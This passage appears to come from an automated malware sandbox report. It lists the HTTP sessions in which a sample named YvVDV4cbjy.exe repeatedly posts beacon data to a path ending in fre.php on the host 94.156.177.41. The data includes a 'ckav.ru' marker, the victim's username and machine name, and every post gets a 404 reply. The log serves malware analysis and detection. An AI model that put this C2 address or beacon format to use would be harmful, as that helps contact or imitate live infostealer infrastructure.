Jan 11, 2025 07:45:09.933379889 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:10.652456045 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49945	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:10.846940994 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:10.851769924 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:11.552751064 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49953	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:11.711446047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:11.717555046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:12.418581009 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49961	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:12.573204041 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:12.578125954 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:13.283997059 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49968	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:13.473692894 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:13.478552103 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:14.187724113 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49974	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:14.335848093 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:14.340905905 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:15.050817013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49980	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:15.203553915 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:15.208568096 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:15.918282986 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49986	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:16.071130037 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:16.076062918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:16.804552078 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49993	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:16.945713997 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:16.950781107 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:17.675302029 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50002	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:17.823518038 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:17.828450918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:18.537332058 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50010	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:18.938288927 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:18.943087101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:19.654258013 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50016	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:19.811455011 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:19.816581011 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:20.537265062 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50022	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:20.687104940 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:20.695533991 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:21.400357962 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50027	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:21.901951075 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:21.906790972 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:22.637254000 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50037	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:22.796314955 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:22.801196098 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:23.500176907 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50043	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:23.650038958 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:23.654932976 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:24.391447067 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50044	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:24.661158085 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:24.666068077 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:25.386995077 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50045	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:25.543946981 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:25.549065113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:26.266272068 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50046	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:26.425388098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:26.431338072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:27.122733116 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50047	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:27.494793892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:27.499769926 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:28.215221882 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50048	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:28.370795965 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:28.375674963 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:29.109587908 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50049	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:45:29.275578976 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:45:29.280517101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:45:29.977284908 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:45:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50050	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
